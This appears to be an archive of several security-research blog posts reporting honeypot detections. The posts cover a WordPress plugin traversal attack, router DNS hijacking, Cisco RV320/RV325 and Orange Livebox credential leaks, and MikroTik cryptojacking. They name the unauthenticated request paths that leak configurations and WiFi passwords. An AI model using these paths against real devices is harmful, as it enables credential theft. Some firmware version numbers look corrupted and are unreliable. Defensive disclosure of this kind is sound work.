On Saturday, April 13, 2019, our honeypots detected an exploit attempt targeting WordPress sites with a defunct plugin, CodeArt – Google MP3 Player, installed. This malicious activity originated from a host on the network of LeaseWeb (AS60781) and exploited a directory traversal flaw to retrieve the wp-config.php settings file. Our scans have indicated 391 WordPress sites are using the vulnerable plugin and are open to this type of attack.
The Exploit Attempt
The wp-config.php file contains sensitive information such as the WordPress database name, username, password and hostname.
This file also contains the WordPress secret keys which can be used to forge authentication cookies. However, access to the WordPress database alone is enough for a threat actor to leverage further attacks to compromise the site. If the password used for the database is same as the admin user (credential reuse) it could be used to take over the targeted site via the front-end.
In short, there’s plenty of damage that can be incurred against a targeted site with the information contained in the wp-config.php file.
Vulnerable Sites Found
Using data provided by PublicWWW, we’ve scanned 964 WordPress sites currently using the “CodeArt – Google MP3 Player” plugin. Our scans found 391 sites are vulnerable.
The top three hosting providers of vulnerable sites are GoDaddy, Unified Layer, and OVH.
188 of the vulnerable sites found are hosted in the United States.
Due to the sensitive nature of this vulnerability, the list of vulnerable websites will not be published publicly. However, the list is freely available for authorized CERT teams to review. We’ve shared our findings directly with MS-ISAC and affected government organizations, such as the Government of Los Angeles County.
The “CodeArt – Google MP3 Player” WordPress plugin is no longer maintained by developers and was last updated six years ago. Anyone still using this plugin is advised to remove it immediately and change their WordPress database and user passwords.
Our honeypots have detected additional directory traversal attacks against vulnerable WordPress sites, including those using the plugin described in this post.
188.8.131.52 (🇫🇷) is exploiting every known #WordPress directory traversal vulnerability to steal database credentials and security keys from targeted sites. pic.twitter.com/WEwIoFKTEL
Over the last three months, our honeypots have detected DNS hijacking attacks targeting various types of consumer routers. All exploit attempts have originated from hosts on the network of Google Cloud Platform (AS15169). In this campaign, we’ve identified four distinct rogue DNS servers being used to redirect web traffic for malicious purposes.
First wave – December 29, 2018
⚠️ WARNING ⚠️ Unauthenticated Remote DNS Change Exploit Detected
This wave targeted the same types of D-Link modems listed above. The rogue DNS server, 184.108.40.206, was again hosted by OVH Canada.
As Twitter user “parseword” noted, the majority of the DNS requests were being redirected to two IPs allocated to a crime-friendly hosting provider (AS206349) and another pointing to a service that monetizes parked domain names (AS395082).
The latest wave of attacks came from three distinct Google Cloud Platform hosts and targeted additional types of consumer routers not previously seen before including: ARG-W4 ADSL routers, DSLink 260E routers, Secutech routers, and TOTOLINK routers.
The rogue DNS servers used in this round, 220.127.116.11 and 18.104.22.168, are both hosted in Russia by Inoventica Services. Internet access is provided by their subsidiary Garant-Park-Internet Ltd (AS47196).
In all three waves, a recon scan was done using Masscan to check for active hosts on port 81/tcp prior to attempting the DNS hijacking exploits.
How many targeted devices are vulnerable?
Establishing a definitive total of vulnerable devices would require us to employ the same tactics used by the threat actors in this campaign. Obviously this won’t be done, however we can catalog how many are exposing at least one service to the public internet via data provided by BinaryEdge:
As we saw in years past with DNSChanger malware raking in $14 million, advertising-related fraud is still very lucrative for cybercriminals. Other researchers have noted domain parking remains a booming business often tied to illicit activities.
DNS hijacking is also used for phishing attacks which are largely transparent to users. In this case, the domain name of the targeted site is redirected by the rogue DNS server to a web server controlled by the threat actor. A recent DNS hijacking campaign targeting Brazilian banks was documented by Radware researchers.
Why was Google Cloud Platform used?
Being a large cloud service provider, dealing with abuse is an ongoing process for Google. However unlike their competitors, Google makes it very easy for a miscreants to abuse their platform.
Anyone with a Google account can access a “Google Cloud Shell” machine by simply visiting this URL. This service provides users with the equivalent of a Linux VPS with root privileges directly in a web browser. Due to the ephemeral nature of these virtual machines coupled with Google’s slow response time to abuse reports, it’s difficult to prevent this kind of malicious behavior.
In general, we recommend users to keep their home router firmware up-to-date. When security vulnerabilities are discovered, they are usually patched by the manufacturer to mitigate further attacks. It’s also advisable to review your router’s DNS settings to ensure they haven’t been tampered with. Typically your DNS servers should be set to the ones provided by your ISP or well-known public DNS resolvers.
Ixia researchers posted their findings on the DNS hijacking attacks originating from Google Cloud Platform. They found sites targeted for phishing included Netflix, PayPal, Uber, Gmail, and more.
We’ve been tracking the DNS hijacking attacks reported by @bad_packets yesterday. Here’s an updated list of targeted domains, along with the new IP hosting the phishing sites. Paypal, Google, Netflix are targeted, along with Brazilian banks and hosting services. HT @_mihaiv_pic.twitter.com/C4tym5dN3H
On Friday, January 25, 2019, our honeypots detected opportunistic scanning activity from multiple hosts targeting Cisco Small Business RV320 and RV325 routers. A vulnerability exists in these routers that allow remote unauthenticated information disclosure (CVE-2019-1653) leading to remote code execution (CVE-2019-1652).
⚠️ WARNING ⚠️ Incoming scans detected from multiple hosts checking for vulnerable Cisco RV320/RV325 routers.
A vulnerability in the web-based management interface of these routers could allow an unauthenticated, remote attacker to retrieve sensitive configuration information. pic.twitter.com/OhQD55WNZD
These scans consisted of a GET request for /cgi-bin/config.exp which is the path that allows unauthenticated remote users to obtain an entire dump of the device’s configuration settings. This includes the administrator credentials, however the password is hashed.
Using data provided by BinaryEdge, we’ve scanned 15,309 unique IPv4 hosts and determined 9,657 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653.
6,247 out of 9,852 Cisco RV320 routers scanned are vulnerable
(1,650 are not vulnerable and 1,955 did not respond to our scans)
3,410 out of 5,457 Cisco RV325 routers scanned are vulnerable
(1,027 are not vulnerable and 1,020 did not respond to our scans)
This interactive map shows the total vulnerable hosts found per country. Overall, vulnerable devices were found in 122 countries and on the network of 1,619 unique internet service providers (autonomous systems).
These routers can be exploited further using the leaked credentials (CVE-2019-1652) resulting in remote code execution detailed in the proof-of-concept published by David Davidson (0x27).
These vulnerabilities affect Cisco RV320/RV325 routers running firmware releases 22.214.171.124 and 126.96.36.199. Cisco has released a patch for these routers that should be applied immediately by anyone using outdated firmware. Changing the device’s admin and WiFi credentials is also highly recommended as they may already be compromised. Cisco has published an advisory providing further details here.
Due to the sensitive nature of these vulnerabilities, the IP addresses of the affected Cisco RV320/RV325 routers will not be published publicly. However, the list is freely available for authorized CERT teams to review. We’ve shared our findings directly with Cisco PSIRT and US-CERT for further investigation and remediation.
Update 2019-01-27: We’ve shared our findings with CIRCL and SingCERT regarding vulnerable routers in Luxembourg and Singapore, respectively.
On Friday, December 21, 2018, our honeypots observed an interesting scan consisting of a GET request for /get_getnetworkconf.cgi. Upon further investigation, we found this traffic was targeting Orange Livebox ADSL modems. A flaw exists in these modems that allow remote unauthenticated users to obtain the device’s SSID and WiFi password.
To assess the amount of devices vulnerable to this flaw, we obtained a list of Orange Livebox modems from Shodan.
Of the 30,063 IPv4 hosts found, our scans revealed:
19,490 leaking their WiFi credentials (SSID/password) in plaintext
2,018 not leaking any information, but still exposed to the internet
8,391 not responding to our scans
Many of the devices found to be leaking their WiFi password use the same password to administer the device (password reuse) or have not configured any custom password – so the factory default “admin/admin” credentials are still applied.
This allows allow any remote user to easily access the device and maliciously modify the device settings or firmware. In addition, they can obtain the phone number tied to the modem and conduct other serious exploits detailed in this Github repository.
Unsurprisingly, the vast majority of affected devices were found to be on the network of Orange Espana (AS12479).
Initial scan source
The initial scan detected by our honeypots came from 188.8.131.52 which is an IP address associated to a Telefonica Spain customer. While we can only guess what the motive was behind these scans, it’s interesting to find the source is physically closer to the affected Livebox ADSL modems than say a threat actor in another country. This could allow them to connect to the WiFi network (SSID) if they were near one of the modems indexed by their scans.
Due to the sensitive nature of this flaw, the IP addresses of affected Orange Livebox ADSL modems will not be published publicly, however is freely available for law enforcement and CERT teams to review. We’ve shared our findings directly with Orange Espana, Orange-CERT, and CCN-CERT for further investigation and remediation.
Update 4:00 AM PT:Orange-CERT has acknowledged our report and is investigating further.
Update 6:00 PM PT:CVE-2018-20377 has been assigned for the flaw described in this post.
Update 2018-12-25: These Orange Livebox Arcadyan ARV7519 modem firmware versions appear to be patched against the “/get_getnetworkconf.cgi” flaw that leaks WiFi credentials:
These versions are not and are vulnerable to CVE-2018-20377:
Update 2018-12-29: Nearly 15,000 Orange Livebox Arcadyan ARV7519 modems have been patched against CVE-2018-20377.
Prior to December 25, over 19,000 Orange Livebox Arcadyan ARV7519 modems were vulnerable to CVE-2018-20377.
Over the last two months, the Bad Packets LLC team has been monitoring over 80 unique cryptojacking campaigns targeting vulnerable MikroTik routers. The latest statistics available from Censys and Shodan confirm hundreds of thousands devices remain compromised.
These MikroTik routers are being compromised by miscreants exploiting CVE-2018-14847, a critical vulnerability that affects all versions of RouterOS through 6.42. A patch was issued earlier this year by MikroTik, however the latest statistics (above) reveal device owners and network operators have chosen not to apply it.
Ali Mosajjal provides an excellent discussion of this vulnerability and how it’s exploited here. Another post, by Simon Kenin, explains how the first cryptojacking campaigns targeted over a 170,000 MikroTik routers in Brazil alone. Kenin described it best when he stated:
“Let me emphasize how bad this attack is. The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source; carrier-grade router devices.’
Despite the warnings from Mosajjal and Kenin, numerous MikroTik routers worldwide remain compromised. Looking strictly at Coinhive infections alone, we clearly see the unfortunate truth.
Looking for compromised #MikroTik routers worldwide? They're easy to locate with these Censys and Shodan queries.
However, Coinhive isn’t the only type of cryptojacking malware being injected via these compromised routers. Looking at all the campaigns noted in the MikroTik Cryptojacking Campaigns spreadsheet, we find some interesting contenders.
While Coinhive is used in the vast majority of cryptojacking campaigns, it is not used by the largest campaign. Instead, CoinImp is used in a campaign consisting of 115,000 MikroTik routers, per the latest Censys results. A large share of compromised devices are found on the network of two service providers in Iran, AS59566 and AS56616.
Twitter user @VriesHd raises a good point that despite clear evidence, no AV company has flagged the domain or URL as malicious. Fortunately, users of the CoinBlockerLists are protected as all domains mentioned in this post and the IOC spreadsheet are included.
Here's something I can't understand; A single cryptojacking campaign targeting Mikrotik routers is allowed to infect 100.000+ routers worldwide, yet barely any AV-company seems to care about the domain, the files or the infections. No blogs. Nothing. srcip[.]com is free to go…. pic.twitter.com/LVc8j2bEMr
In this case, the cryptojacking malware appears to be injecting MinerAlt, a service that mines CryptoNight coins (Monero, Electroneum, etc.) while taking 30% of the revenue of their users. Unlike Coinhive, the websocket traffic is not in plain text (shown in tweet above).
Infected routers in this campaign are configured to throttle the CPU usage of the victims’ devices in a likely attempt to reduce detection. In the example shown below, the amount of CPU power used for mining cryptocurrency is roughly 80%.
United States cryptojacking campaigns
Looking specifically at compromised MikroTik routers in the United States, a few troubling cryptojacking campaigns were found. On August 25, nearly 3,000 compromised routers with IP addresses assigned to Cogent Communications were located on Censys.
Over 4,000 compromised #MikroTik routers in the United States injecting Coinhive found on @censysio.
Almost a month later, another surprising cryptojacking campaign was discovered. This new campaign included over 600 MikroTik routers on the network of Douglas County Public Utility District in north central Washington state. Their network, AS27373, has been allocated 1,792 IPv4 addresses and the latest Censys results show 703 IPs consisting solely of MikroTik routers. In other words, 39% of the IPs they manage route to a compromised device.
Upon reviewing these findings, I notified US-CERT (NCCIC) in addition to other members of federal law enforcement as these routers on the network of a public energy co-operative. While I never received confirmation that an NCCIC incident number was assigned, I was told by the NCCIC to continue to send in similar reports in the future.
It’s alarming to see so many devices on a public utilities’ network compromised, so I hope the NCCIC is able provide them with guidance and/or assistance with the remediation process.
In less than 9 hours, the total found on Censys for the US has increased to 7,765. The network with the largest share of compromised MikroTik routers is AS18771 (Agavue LLC aka Cibola Wireless). This provider is a WISP in Albuquerque, NM. https://t.co/oQx6UMEiFD
The latest results found on Censys indicate cryptojacking campaigns targeting vulnerable MikroTik routers in the United States is not slowing down. Many Wireless Internet Service Providers (WISPs) appear to affected as numerous compromised devices can be found on their networks.
Instead of listing each IOC here, I have placed them in the MikroTik cryptojacking campaigns spreadsheet that lists each site key used for every campaign and includes notes on how the malware is injected.
Thanks to Censys for providing me with the API credits needed to keep this list frequently updated.
As I recently told Threatpost, scraping for pennies with Coinhive is not the worst-case scenario that miscreants can do with these compromised MikroTik routers. The report published by Netlab 360 illustrated how they can used for much more nefarious purposes such as eavesdropping all traffic passing through them.
MikroTik users need to ensure they’re running the latest version of RouterOS which has patched CVE-2018-14847. Anyone using version 6.42 or older should apply the update ASAP, available here.
As always, I’m most active on Twitter — please follow @bad_packets for the latest updates.
The statistics shared in this post were accurate as of September 28, 2018. Since then, the amount of compromised MikroTik routers worldwide has greatly increased. The latest totals reveal over 400,000 have been hacked by miscreants.
421,073 compromised MikroTik routers found on @censysio.
Active #cryptojacking campaigns (unique IOCs): 106 Coinhive: 77 CoinImp: 9 WebMinePool: 6 OMINE (XMR pool): 3 All others: 11